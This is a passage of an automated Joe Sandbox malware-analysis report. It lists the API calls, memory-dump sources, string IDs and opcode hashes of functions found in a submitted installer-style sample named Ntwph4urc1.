                                              • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                              Function 73F5161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73F52238,?,00000808), ref: 73F51635
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73F52238,?,00000808), ref: 73F5163C
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73F52238,?,00000808), ref: 73F51650
                                              • GetProcAddress.KERNEL32(73F52238,00000000), ref: 73F51657
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51660
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 7b9b7adccdf88cfbc326afbfa25b67313081b217e6cf14c3d088a0c45bb8f92b
                                              • Instruction ID: 8b3a933f08892f9f312cded3914ce0e24333990ffbb0554787fb8479e454826b
                                              • Opcode Fuzzy Hash: 7b9b7adccdf88cfbc326afbfa25b67313081b217e6cf14c3d088a0c45bb8f92b
                                              • Instruction Fuzzy Hash: F3F0AC7320A1387BD62136A78C4CD9BBE9CDF8B2F5B310215F62D921A086615D02DBF1
                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                              • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                              • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                              • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                              Function 00404BF1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                              • wsprintfW.USER32 ref: 00404C9B
                                              • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                              • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                              • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                              • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                              Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 2655323295-2176574564
                                              • Opcode ID: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                              • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                              • Opcode Fuzzy Hash: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                              • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                              Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • CharNextW.USER32(00000000), ref: 00405D81
                                              • CharNextW.USER32(00000000), ref: 00405D99
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, xrefs: 00405D6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 3213498283-2176574564
                                              • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                              • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                              • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                              • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                              Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3936084776
                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                              Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll), ref: 0040268D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll
                                              • API String ID: 1659193697-1120995959
                                              • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                              • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                              • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                              • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                              Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                              • GetTickCount.KERNEL32 ref: 00402FE2
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                              • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                              • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                              • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                              • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                              Function 004053CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004053F9
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                              • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                              • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                              • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                              Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                              • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
